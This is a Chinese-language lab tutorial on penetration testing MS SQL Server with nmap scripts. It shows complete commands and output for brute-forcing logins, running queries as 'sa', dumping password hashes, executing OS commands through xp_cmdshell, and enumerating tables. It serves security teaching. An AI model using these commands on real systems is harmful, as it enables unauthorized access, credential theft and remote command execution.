利用Nmap對MSSQL進行滲透測試

利用nmap腳本對MS SQL Server 進行滲透測試，擷取嗎目标使用者名、資料庫表等資訊。

#準備階段

攻擊機器：Kali (裝有nmap)

目标機器：Windows Server 2019 (安裝SQL Server 2016)

nmap自帶一系列用于測試的腳本，用于mssql的腳本可以通過如下語句查詢：

─$ locate *.nse | grep ms-sql    
/usr/share/nmap/scripts/broadcast-ms-sql-discover.nse
/usr/share/nmap/scripts/ms-sql-brute.nse
/usr/share/nmap/scripts/ms-sql-config.nse
/usr/share/nmap/scripts/ms-sql-dac.nse
/usr/share/nmap/scripts/ms-sql-dump-hashes.nse
/usr/share/nmap/scripts/ms-sql-empty-password.nse
/usr/share/nmap/scripts/ms-sql-hasdbaccess.nse
/usr/share/nmap/scripts/ms-sql-info.nse
/usr/share/nmap/scripts/ms-sql-ntlm-info.nse
/usr/share/nmap/scripts/ms-sql-query.nse
/usr/share/nmap/scripts/ms-sql-tables.nse
/usr/share/nmap/scripts/ms-sql-xp-cmdshell.nse
           

#擷取資料庫版本資訊

使用ms-sql-info腳本擷取目标資料庫版本等資訊

nmap -p 1433 -Pn --script ms-sql-info 192.168.91.133
//-p 表示指定端口号、-Pn：不檢測主機存活、--script 指定腳本
           

擷取的資訊如下：

#使用者憑證爆破

使用ms-sql-brute腳本可以對資料庫使用者名和密碼進行枚舉和爆破

nmap -p 1433 -Pn --script ms-sql-brute --script-args userdb=mssql_user.txt,passdb=mssql_pass.txt 192.168.91.133
// --script-args 指定腳本參數；userdb= 指定使用者名字典 ；passdb= 指定密碼字典
           

結果如下：

得到的使用者名和密碼：

sa:Password@123
pentest:123456
           

#執行SQL語句

利用前面得到的憑據，可以調用nmap的ms-sql-query腳本在目标上執行SQL查詢

用法如下：

nmap -p1433 -Pn --script ms-sql-query --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-query.query="SQL查詢語句" 192.168.91.133
           

列出目标上的所有資料庫

nmap -p1433 -Pn --script ms-sql-query --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-query.query="sp_databases" 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 01:57 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00051s latency).

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-query: 
|   [192.168.91.133:1433]
|     Query: sp_databases
|       DATABASE_NAME	DATABASE_SIZE	REMARKS
|       =============	=============	=======
|       master	7552	Null
|       model	16384	Null
|       msdb	21888	Null
|_      tempdb	16384	Null

Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds

           

#NetBIOS 資訊收集

利用ms-sql-ntlm-info腳本對啟用 了NTLM 身份驗證的遠端SQL Server主機NetBIOS資訊進行收集。

原理是發送無效域和空憑據的MS-TDS NTLM 身份驗證請求将導緻遠端服務以 NTLMSSP 消息進行響應，該消息會洩露包括 NetBIOS、DNS 和作業系統版本資訊。

nmap -p1433 -Pn --script ms-sql-ntlm-info 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:08 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00053s latency).

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-ntlm-info: 
|   Target_Name: WIN-8EIGFF6H8PR
|   NetBIOS_Domain_Name: WIN-8EIGFF6H8PR
|   NetBIOS_Computer_Name: WIN-8EIGFF6H8PR
|   DNS_Domain_Name: WIN-8EIGFF6H8PR
|   DNS_Computer_Name: WIN-8EIGFF6H8PR
|_  Product_Version: 10.0.17763
           

#MSSQL 密碼哈希轉儲

使用ms-sql-dump-hashes可以導出mssql密碼哈希，可以提供給John-the-ripper這類工具使用。

nmap -p 1433 -Pn --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=Password@123 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:22 EDT
Nmap scan report for 192.168.91.133
Host is up (0.0011s latency).

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-dump-hashes: 
| [192.168.91.133:1433]
|     sa:0x02002df771b8ffe860cb75e4bea87df48dd2fc38c35566eed3bf636aa962b2a24768387120df74d775627ea8ab10cd2339b525706fa0f68cbdff4580fcfddef2cb98493cce87
|     ##MS_PolicyEventProcessingLogin##:0x02001be8e4066350f72d7043e3b6fe080efb16a0cf424a4a1f078d84509d013946acaf49c08fdb534044432e474422769e4d43baa399bb094aa532e1333f6ec9c4eb01b4120c
|     ##MS_PolicyTsqlExecutionLogin##:0x02002f2e008251ee080daa07829e49ef4baf8624e26bc34a37096691751f83b4d7122f8bf1015db9ba5a519f483da5d366712c0fc54f8250ae8ce38db43e8e9f616cd0faab97
|_    pentest:0x020025bc596aaf94a1f764ccaca6cd6d0615cfba0f01140879c21df33959e492254ef66d53ddbfb0c961e3f04bfb376294d7194fcd61b0b6b85b06387d6f975b92a779544ab6

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds

           

#指令執行

xp_cmdshell 是 Microsoft SQL Server 的一項功能，它允許系統管理者執行作業系統指令。預設情況下，xp_cmdshell 選項是禁用的。如果在目标伺服器中啟用了 xp_cmdshell，可以利用ms-sql-xp-cmdshell腳本在目标機器上執行系統指令。

nmap -p1433 -Pn --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.91.133

//ms-sql-xp-cmdshell.cmd= 指定要執行的指令

           

nmap -p1433 -Pn --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:28 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00047s latency).

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-xp-cmdshell: 
|   [192.168.91.133:1433]
|     Command: ipconfig
|       output
|       ======
|       Null
|       Windows IP \xE9\x85\x8D\xE7\xBD\xAE
|       Null
|       Null
|       \xE4\xBB\xA5\xE5\xA4\xAA\xE7\xBD\x91\xE9\x80\x82\xE9\x85\x8D\xE5\x99\xA8 Ethernet0:
|       Null
|          \xE8\xBF\x9E\xE6\x8E\xA5\xE7\x89\xB9\xE5\xAE\x9A\xE7\x9A\x84 DNS \xE5\x90\x8E\xE7\xBC\x80 . . . . . . . : localdomain
|          \xE6\x9C\xAC\xE5\x9C\xB0\xE9\x93\xBE\xE6\x8E\xA5 IPv6 \xE5\x9C\xB0\xE5\x9D\x80. . . . . . . . : fe80::c0cf:a5e8:ba66:9b8d%6
|          IPv4 \xE5\x9C\xB0\xE5\x9D\x80 . . . . . . . . . . . . : 192.168.91.133
|          \xE5\xAD\x90\xE7\xBD\x91\xE6\x8E\xA9\xE7\xA0\x81  . . . . . . . . . . . . : 255.255.255.0
|          \xE9\xBB\x98\xE8\xAE\xA4\xE7\xBD\x91\xE5\x85\xB3. . . . . . . . . . . . . : 192.168.91.2
|_      Null
           

#空密碼登入測試

如果管理者将密碼設定為空，那麼攻擊者就可以直接登入到資料庫。

利用ms-sql-empty-password腳本可以對目标進行SQL Server 空密碼登入測試

nmap -p1433 -Pn --script ms-sql-empty-password 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:36 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00056s latency).

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-empty-password: 
|   [192.168.91.133:1433]
|_    sa:<empty> => Login Success

Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
           

#檢視資料庫表

ms-sql-tables 腳本可以列出目标的資料庫表

Tips：預設情況下MSSQL中沒有資料庫，要建立一個資料庫和插入表，不然執行下列腳本會報錯。

nmap -p1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=Password@123 192.168.91.133
           

nmap -p1433 -Pn --script ms-sql-tables --script-args mssql.username=sa,mssql.password=Password@123 192.168.91.133 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 04:28 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00079s latency).

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-tables: 
|   [192.168.91.133:1433]
|       pentest
|         table	column	type	length
|         =====	======	====	======
|         Table_1	password	nchar	40
|         Table_1	username	nchar	40
|       
|       Restrictions
|         Output restricted to 2 tables (see ms-sql-tables.maxtables)
|         Output restricted to 5 databases (see ms-sql-tables.maxdb)
|_        No filter (see ms-sql-tables.keywords)

Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds